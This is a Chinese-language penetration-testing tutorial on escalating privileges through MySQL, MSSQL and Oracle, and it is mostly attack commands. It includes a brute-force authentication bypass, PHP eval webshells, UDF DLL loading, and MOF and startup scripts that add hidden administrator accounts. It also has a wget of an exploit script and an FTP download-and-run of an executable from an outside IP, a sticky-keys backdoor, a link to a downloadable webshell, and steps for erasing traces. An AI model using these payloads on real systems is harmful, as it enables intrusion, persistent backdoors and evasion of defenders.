前言
數據庫權限
在平常的滲透提權中,我們通常可以在一些特殊情況下得到數據庫的用戶名和密碼(最高權限root),如下:
MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 網站的數據庫配置文件中拿到明文密碼信息 CVE-2012-2122 等這類漏洞直接拿下 MySQL 權限
口令爆破、sqlmap的--sql-shell模式和數據庫配置文件中拿明文密碼已經老生常談了,這里主要演示一下CVE-2012-2122
CVE-2012-2122
當連接MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。 也就是說只要知道用戶名,不斷嘗試就能夠直接登入SQL數據庫。按照公告說法大約256次就能夠蒙對一次。
#受影響版本
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
在vunlub中啟動CVE-2012-2122環境
環境啟動后用docker ps查看進程
可以看到啟動了一個Mysql服務(版本:5.5.23),監聽端口為3306端口,默認的root用戶的密碼為123456
我們可以使用mysql客戶端進行遠程連接數據庫
連接測試就證明我們的環境正常搭建。然后就是漏洞利用了,正常模擬攻擊者,我們是沒有密碼,不知道root的密碼為123456的,這個時候我們就可以利用CVE-2012-2122來進行身份繞過
msf可以導出hash值
msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf6 > set rhosts 192.168.178.128 msf6 > run
或者直接bash輸入
root@root:~/桌面# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.178.128 2>/dev/null; done Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 854 Server version: 5.5.23 Source distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]>
MySQL提權
Webshell權限
into oufile 寫 shell
into oufile 寫 shell要滿足如下條件才可以寫入
1、知道網站物理路徑 2、高權限數據庫用戶 3、load_file() 開啟 即 secure_file_priv 無限制 4、網站路徑有寫入權限
數據庫查看是否有secure_file_priv限制
mysql> show global variables like '%secure_file_priv%'; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | NULL | +------------------+-------+
| Value | 說明 |
|---|---|
| NULL | 不允許導入或導出 |
| / | 只允許在 / 目錄導入導出 |
| 空 | 不限制目錄 |
在 MySQL 5.5 之前 secure_file_priv 默認是空,這個情況下可以向任意絕對路徑寫文件
在 MySQL 5.5之后 secure_file_priv 默認是 NULL,這個情況下不可以寫文件
利用phpmyadmin來into outfile
首先在存在phpmyadmin時,我們可以試試弱口令,root、root來進行登錄phpmyadmin后台。登錄進去后我們獲取網站的絕對路徑來進行寫shell
在phpmyadmin中,我們可以利用log變量來猜測網站的絕對路徑
這里是用phpstudy搭建的網站,所以猜測網站目錄在WWW目錄下,或者通過其他手段的信息收集,來收集到我們的網站絕對路徑。
有了網站路徑,我們就可以執行SQL命令來進行寫shell
寫入失敗,這里失敗的原因是因為我們前面查詢secure_file_priv值為null,所以權限就是不允許導入或導出,這里我們對secure_file_priv進行修改為空后,再進行寫入。
因為secure_file_priv為只讀權限,所以我們打開my.ini文件,加入如下語句再重啟服務器。
secure_file_priv=''
這時查看權限為所有目錄下可寫入
再次寫入shell,會發現成功寫入。
然后菜刀、蟻劍進行連接。
當然我么還可以利用sqlmap進行文件的寫入,如下:
sqlmap -u "http://x.x.x.x/?id=x" --file-write="c:/Users/suifeng/Desktop/shell.php" --file-dest="C:/phpstudy_pro/WWW/shell.php"
當然這種寫shell的方式,在MySQL 5.5之后已經很難實現了,因為MySQL 5.5之后值為NULL,在secure_file_priv沒有導入導出權限的時候,我們還可以利用日志寫shell。
利用日志寫shell
在MySQL 5.0 版本以上會創建日志文件,我們可以通過修改日志的全局變量中的存儲位置來 getshell
mysql> SHOW VARIABLES LIKE '%general%'; +------------------+-----------------------------------------------------------------+ | Variable_name | Value | +------------------+-----------------------------------------------------------------+ | general_log | OFF | | general_log_file | C:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-1G2NI5V.log | +------------------+-----------------------------------------------------------------+
general_log 默認關閉,高權限的用戶可以直接通過mysql命令行進行開啟,開啟后日志文件記錄用戶的每條指令,將其保存在general_log _file中。我們可以通過開啟general_log ,然后自定義general_log _file來進行getshell。
mysql> set global general_log = "ON"; #開啟general_log
mysql> set global general_log_file='c:/phpstudy_pro/www/shell.php'; #修改general_log_file路徑
再次查看權限
#寫入shell mysql> select "<?php @eval($_POST['suifeng']);?>"; +-----------------------------------+ | <?php @eval($_POST['suifeng']);?> | +-----------------------------------+ | <?php @eval($_POST['suifeng']);?> | +-----------------------------------+
然后蟻劍連接
服務器權限
UDF提權
什么是UDF
UDF(user-defined function)是MySQL的一個拓展接口,也可稱之為用戶自定義函數,它是用來拓展MySQL的技術手段,可以說是數據庫功能的一種擴展,用戶通過自定義函數來實現在MySQL中無法方便實現的功能,其添加的新函數都可以在SQL語句中調用,就像調用一些系統函數如version()函數便捷。
動態鏈接庫
提權大致方法是把我們的動態鏈接庫放置在特點的目錄下,創建我們自定義函數,實現系統函數命令的調用,最終導致提權。
在mysql<5.1 導出目錄c:/windows或system32
在mysql>=5.1 導出安裝目錄/lib/plugin/
在有注入點時候,我們可以通過sqlmap中里的UDF動態鏈接庫進行導入
#sqlmap中動態鏈接庫位置
D:\tools\sqlmap\data\udf\mysql
里面有windows和linux且64位和32位版本,大家可以根據被攻擊器來進行選擇
sqlmap中的動態鏈接庫為了防止被殺毒軟件查殺,都經過了編碼處理,不能直接使用,所以我們還需要用sqlmap自帶的解碼工具clock.py進行解碼
#cloak位置
D:\tools\sqlmap\extra\cloak
#解碼操作
D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\windows\64\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll #windows解碼
D:\tools\sqlmap\extra\cloak>python cloak.py -d -i d:\tools\sqlmap\data\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so #linux解碼
動態鏈接庫上傳位置
在上傳動態鏈接庫之前,我們要先對mysql的版本進行判斷
#判斷數據庫版本 mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.26 | +-----------+
這里被攻擊的靶機版本為5.7.26,所以我們要把動態鏈接庫上傳到安裝目錄/lib/plugin/下面,那我們可以利用如下命令查找安裝目錄
mysql> show variables like '%plugin%'; +-------------------------------+----------------------------------------------------+ | Variable_name | Value | +-------------------------------+----------------------------------------------------+ | default_authentication_plugin | mysql_native_password | | plugin_dir | C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin\ | +-------------------------------+----------------------------------------------------+
mysql> select @@basedir;
+-----------------------------------------+
| @@basedir |
+-----------------------------------------+
| C:\phpstudy_pro\Extensions\MySQL5.7.26\ |
+-----------------------------------------+
來到對應的目錄下並沒有發現/lib/plugin,所以我們需要自己創建一個/lib/plugin,但是真實環境下我們服務器權限還沒有拿下(這里用是為了觀察直觀),所以我們可以在webshell環境下或者通過NTFS ADS流創建文件夾。
#NTFS ADS流創建語句 mysql> select 'x' into dumpfile 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin::$INDEX_ALLOCATION'; #創建不一定成功,不成功的情況下還是利用webshell的權限創建目錄
創建好后我們就可以導入我們的動態鏈接庫了。
導入動態鏈接庫
存在sql注入時
在存在sql注入的時候,我們可以通過sqlmap來上傳動態鏈接庫,但是需要滿足的條件為secure_file_priv的值為空,sql注入為最高權限,又因為 GET 有字節長度限制,所以往往 POST 注入才可以執行這種攻擊。
python sqlmap.py -u "http://192.168.178.130/sqli-labs/Less-1/?id=1" --file-write="d:/tools/sqlmap/extra/cloak/lib_mysqludf_sys_64.dll" --file-dest="C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll"
不存在sql注入時
沒有sql注入時,我們可以通過執行sql語句來進行寫入動態鏈接庫,這里需要寫入文件,所以需要secure_file_priv為空。
#select后面為動態鏈接庫的十六進制編碼(數據太長,這里省略顯示)
SELECT 0x4d5a900003... INTO DUMPFILE 'C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/lib_mysqludf_sys_64.dll';
動態鏈接庫的十六進制可以通過mysql自帶的hex函數或者一些文件十六進制編碼器工具解決。當然在sql語句寫不進去的動態鏈接庫的時候,我們還可以通過我們的webshell來進行上傳。
文件上傳完成后
我們就可以通過sql語句來自定義函數了
#原本執行代碼 CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';
#修改后執行代碼
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
本來應該執行這條命令來自定義命令的,但是一直報錯,后來我把dll文件名字修改之后,創建成功。(可能是下划線導致函數在編譯情況下出問題)
#查詢自定義函數
mysql> select * from mysql.func; +----------+-----+---------+----------+ | name | ret | dl | type | +----------+-----+---------+----------+ | sys_eval | 0 | udf.dll | function | +----------+-----+---------+----------+
#創建成功后,我們利用自定義函數進行命令執行
mysql > select sys_eval('whoami');
然后用我們這個自定義命令執行函數進行提權即可。最后為了權限維持,防止被發現,我們可以對自定義函數進行刪除。
#刪除自定義函數 mysql> drop function sys_eval;
這種手工UDF提權無疑太過繁瑣,這里主要推薦通過網頁版一鍵提權腳本,這里使用的是月師傅的馬,下面是下載地址
鏈接:https://pan.baidu.com/s/1a5ASE2TLvnKsOUxsHKBjOw 提取碼:v9s9
上傳后訪問
然后再導入,執行命令即可
MOF提權
現在通過mof文件來進行提權已經非常困難了,因為它支持提權版本只有2003和一些之前的版本。mof的提權原理為mof文件每五秒就會執行,而且是系統權限,我們通過mysql使用load_file 將文件寫入/wbme/mof,然后系統每隔五秒就會執行一次我們上傳的MOF。MOF當中有一段是vbs腳本,我們可以通過控制這段vbs腳本的內容讓系統執行命令,進行提權。
mof腳本如下
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user suifeng p@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators suifeng /add\")"; #創建用戶
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};首先我們將我們的腳本上傳,然后用如下命令上傳到指定目錄。
select load_file("C:/Documents and Settings/suifeng.mof") into dumpfile "c:/windows/system32/wbem/mof/suifeng.mof";
然后等待五秒后用net user命令可以看到創建的用戶
mof提權痕跡清理
因為每隔幾秒鍾時間又會重新執行添加用戶的命令,所以想要清理痕跡得先暫時關閉 winmgmt 服務再刪除相關 mof 文件
#停止winmgmt服務 net stop winmgmt #刪除Repository文件夾 rmdir /s /q C:\Windows\system32\wbem\Repository\ #重新啟動服務 net start winmgmt
啟動項提權
MySQL的啟動項提權,原理就是通過mysql把一段vbs腳本導入到系統的啟動項下,如果管理員啟動或者重啟的服務器,那么該腳本就會被調用,並執行vbs腳本里面的命令。
以下是啟動項路徑
#2003 C:\Documents and Settings\Administrator\Start Menu\Programs\Startup C:\Documents and Settings\All Users\Start Menu\Programs\Startup #2008 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
有了路徑我們在mysql的shell下輸入如下代碼
create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"") " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " ); select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\a.vbs";
然后我們在對應路徑下就可以看到我們的vbs腳本了
然后重啟,即可發現vbs腳本里面創建的用戶。
CVE-2016-6663、CVE-2016-6664組合提權
在一些Mysql小於5.5.51或小於5.6.32或小於5.7.14及衍生版本,我們都可以利用CVE-2016-6663、CVE-2016-6664組合對其進行測試提權。
1、利用CVE-2016-6663將www-data權限提升為mysql權限:
cd /var/www/html/ gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient ./mysql-privesc-race test 123456 localhost testdb
2、利用CVE-2016-6664將Mysql權限提升為root權限:
wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh chmod 777 mysql-chowned.sh ./mysql-chowned.sh /var/log/mysql/error.log
MSSQL提權
mssql提權前期要做的工作和mysql提權一樣,這里就不再過多的敘述了,主要介紹一下提權方法。
mssql提權必知基本命令
select @@version #查看數據庫版本 select db_name() #查看當前數據庫 select IS_SRVROLEMEMBER('sysadmin') #判斷是否為sa權限 select IS_MEMBER('db_owner') #判斷是否為dba權限 exec master..xp_msver #查看數據庫系統參數
#開啟xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure;
#關閉xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure;
#禁用advanced options EXEC sp_configure 'show advanced options',0;GO RECONFIGURE;
#sp_OACreate執行命令 DECLARE @js int EXEC sp_OACreate 'ScriptControl',@js OUT EXEC sp_OASetProperty @js,'Language','JavaScript' ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'
#sp_OACreate移動文件 declare @aa int exec sp_oacreate 'scripting.filesystemobject' @aa out exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';
#sp_OACreate復制文件 declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
#sp_OACreate刪除文件 DECLARE @Result int DECLARE @FSO_Token int EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [開始] 菜單\程序\啟動\user.bat' EXEC @Result = sp_OADestrop @FSO_Token
mssql提權必知權限管理
1.bulkadmin:這個角色可以運行BULK INSERT語句.該語句允許從文本文件中將數據導入到SQL Server2008數據庫中,為需要執行大容量插入到數據庫的域帳號而設計. 2.dbcreator:這個角色可以創建,更改,刪除和還原任何數據庫.不僅適合助理DBA角色,也可能適合開發人員角色. 3.diskadmin:這個角色用於管理磁盤文件,比如鏡像數據庫和添加備份設備.適合助理DBA 4.processadmin:SQL Server 2008可以同時多進程處理.這個角色可以結束進程(在SQL Server 2008中稱為"刪除") 5.public:有兩大特點:第一,初始狀態時沒有權限;第二,所有數據庫用戶都是它的成員 6.securityadmin:這個角色將管理登錄名及其屬性.可以授權,拒絕和撤銷服務器級/數據庫級權限.可以重置登錄名和密碼 7.serveradmin:這個角色可以更改服務器范圍的配置選項和關閉服務器 8.setupadmin:為需要管理聯接服務器和控制啟動的存儲過程的用戶而設計. 9.sysadmin:這個角色有權在SQL Server 2008 中執行任何操作.
xp_cmdshell提權
xp_cmdshell的作用類似於mysql的udf,其本質是一些sql語句的集合,xp_cmdshell也可以理解為一些危險性比較高的小腳本。
xp_cmdshell在mssql2000中開啟,在2005之后就是默認禁止的,我們需要sa權限來開啟xp_cmdshell
#開啟xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell',1;reconfigure; #關閉開啟xp_cmdshell exec sp_configure 'show advanced options', 1;reconfigure; exec sp_configure 'xp_cmdshell', 0;reconfigure
在打開了xp_cmdshell之后,我們就可以進行執行命令了
EXEC master.dbo.xp_cmdshell 'whoami'
sp_OACreate提權
當xp_cmdshell不可用的時候,我們還可以利用sc_oacreate來進行提權
#開啟sc_oacreate EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;
1)直接加用戶 2000系統: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 123 123 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 123/add' xp和2003系統: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 123$ 123/add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 123$ /add' 2)粘貼鍵替換 declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'; declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 需要同時具備sp_oacreate 和sp_oamethod 兩個功能組件 3)直接傳馬 DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'-- 4)啟動項寫入加賬戶腳本 declare @sp_passwordxieo int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo out exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")' exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"' exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo' exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)' exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"'; 5)如果該服務器有網站,則直接用方法4)寫入一句話
沙盒提權
什么是沙盒模式?
沙盒模式是數據庫的一種安全功能.在沙盒模式下,只對控件和字段屬性中的安全且不含惡意代碼的表達式求值.如果表達式不使用可能以某種方式損壞數據的函數或屬性,則可認為它是安全的.
利用條件:
1,Access可以調用VBS的函數,以System權限執行任意命令
2,Access執行這個命令是有條件的,需要一個開關被打開
3,這個開關在注冊表里
4,SA是有權限寫注冊表的
5,用SA寫注冊表的權限打開那個開關
6,調用Access里的執行命令方法,以system權限執行任意命令執行SQL命令,執行了以下命令
開啟默認關閉的xp_regwrite存儲過程:
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
利用jet.oledb執行系統命令添加系統賬號:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
Oracle提權
Oracle權限分配
系統權限
系統規定用戶使用數據庫的權限。(系統權限是對用戶而言)。
系統權限分類DBA: 擁有全部特權,是系統最高權限,只有DBA才可以創建數據庫結構。RESOURCE:擁有Resource權限的用戶只可以創建實體,不可以創建數據庫結構。CONNECT:擁有Connect權限的用戶只可以登錄Oracle,不可以創建實體,不可以創建數據庫結構。
對於普通用戶:授予connect, resource權限。
對於DBA管理用戶:授予connect,resource, dba權限。
實體權限
某種權限用戶對其它用戶的表或視圖的存取權限。(是針對表或視圖而言的)。
實體權限分類
select, update, insert, alter, index, delete, all //all包括所有權限execute //執行存儲過程權限
Oracle提權方法
通過注入存儲過程提權(低權限提升至DBA)
原理
SYS創建的存儲過程存在sql注入。擁有create procedure權限的用戶通過創建提權函數,將提權函數注入到存儲過程中,於是該存儲過程將調用這個提權函數來執行grant dba to quan命令,獲得Oracle數據庫dba權限。
利用條件
1、SYS創建的存儲過程存在sql注入(EG:CVE-2005-4832) 2、用戶擁有create procedure權限(用來創建函數)
提權步驟
假設有一個用戶quan 只有 CONNECT 和 RESOURCE 權限
手工注入
(1)用戶登陸后執行select * from session_privs查看權限 (2)創建函數,命令為grant dba to quan grant execute on pwn to public;//賦予所有用戶此函數的執行權限 SQL>create or replace function pwn return vaarchar2 authid current_user is pragma autonomous_transaction; begin execute immediate 'grant dba to quan'; return ''; end; / SQL>grant execute on pwn to public; / (3)注入sys.dbms_cdc_subscribe.activate_subscription SQL>begin sys.dbms_cdc_subscribe.activate_subscription('''||quan.pwn()||'''); end; / SQL>set role dba; (4)執行select * from session_privs查看是否為dba權限
利用MSF注入
(1)加載攻擊模塊 use auxiliary/sqli/oracle/dbms_cdc_subscribe.activate_subscription (2)配置參數 set dbuser quan set dbpass quan123 set sid orcl set rhost xxxxx set sql grant dba to quan (3)run
2、通過utl_http.request存儲過程提權
原理
Oracle9i~11gR2中dbms_xmlquery.newcontext()和dbms_xmlquery.getxml()函數可以執行任意PL/SQL語句,利用這兩個函數可以獲得Oracle服務器的操作系統權限。
2.2 利用條件
1、UTL_HTTP存儲過程可用 2、Oracle9i~11gR2
提權步驟
(1)創建Java包
(2)創建存儲過程MYJAVACMD
(3)執行存儲過程,成功添加用戶